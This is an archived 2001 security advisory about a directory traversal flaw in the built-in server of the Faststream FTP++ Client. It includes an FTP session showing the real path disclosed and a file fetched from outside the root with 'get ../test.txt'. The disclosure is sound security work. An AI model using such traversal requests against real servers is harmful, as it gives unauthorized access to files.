OpenNET security: Faststream FTP++ Client 2 Beta 11 (build in server) Vulnerability

Faststream FTP++ Client 2 Beta 11 (build in server) Vulnerability


<< Previous	INDEX	Search	src	Set bookmark	Go to bookmark	Next >>

Date: Sun, 4 Mar 2001 16:26:23 -0000
From: [email protected]
To: [email protected]
Subject: Faststream FTP++ Client 2 Beta 11 (build in server) Vulnerability

Faststram FTP built in server responds with the real 
path of directory
instead of a virtual one.It is possible to get files 
outside of root.dir.

e:\crap was used as root directory

1. directory path

230 User anonymous logged in.
ftp> pwd
257 "/E:/crap/" is current directory.

2. getting files from outside of root

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
-rw-rw-rw-   1 ftp      ftp            6 Mar 02 12:33 
movedtohomedir.txt
-rw-rw-rw-   1 ftp      ftp           11 Mar 02 00:29 
bisontest.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 03 15:59 HTTP
drw-rw-rw-   1 ftp      ftp            0 Mar 03 17:05 huhu
226 File sent ok
FTP: 438 Bytes empfangen in 0,00Sekunden 
438000,00KB/s
ftp> get ../test.txt
200 Port command successful.
150 Opening data connection for ../test.txt.
226 File sent ok
FTP: 15 Bytes empfangen in 0,01Sekunden 1,50KB/s

Solution:
no quick fix possible.Use with care.

Author has been contacted on 04.Mar.2001

[email protected]
[email protected]


<< Previous	INDEX	Search	src	Set bookmark	Go to bookmark	Next >>

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру